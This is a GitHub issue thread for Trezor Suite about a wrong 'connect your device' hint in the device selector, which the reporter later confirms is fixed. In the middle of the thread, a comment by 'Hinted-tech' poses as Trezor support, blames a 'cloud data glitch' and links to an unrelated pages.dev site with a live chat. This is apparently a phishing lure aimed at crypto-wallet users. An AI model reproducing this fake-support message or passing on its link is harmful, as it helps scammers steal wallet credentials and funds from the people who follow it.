### ISSUE TITLE
In device selector hint says `Connect your device to add other wallets` even your device is connected

### ISSUE THREAD

**Issue by bosomt** [trezor/trezor-suite#15729]
**Describe the bug**
In device selector hint says `Connect your device to add other wallets` even your device is connected.
When device is disconnected only 🚯 is rendered without any hint

**Steps to reproduce:**
1. Connect device
2. Hover over passphrase wallet or standard wallet button
3. Observe hint text

**Info:**
 - Suite version: web 24.12.0 (be25d7ed68569190cdc2a07bd5f129ead27fbb97)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.6 regular (revision 688bddc887b8bb660640cc6e40a99036f2e87f1f)
 - Transport: BridgeTransport 2.0.33

**Screenshots:**
<img width="442" alt="image" src="https://github.com/user-attachments/assets/f5efe2ba-bea7-4bf7-a2b3-2f7d6bff69cf">

https://github.com/user-attachments/assets/2ecc40b5-6909-417a-8fc9-4d70d0429b86

**Comment by Hinted-tech** [comment]
@bosomt We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Trezor Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by bosomt** [comment]
**QA OK**

already fixed in 24.12.1 release


**Info:**
 - Suite version: desktop 25.1.0 (0b116799334cb4a05fcb59cc480deb7c4b9a63e9)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) TrezorSuiteDev/25.1.0 Chrome/128.0.6613.186 Electron/32.2.6 Safari/537.36
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.7 regular (revision e196413bb745443610211c325623ba7cee7309e9)
 - Transport: BridgeTransport 2.0.33
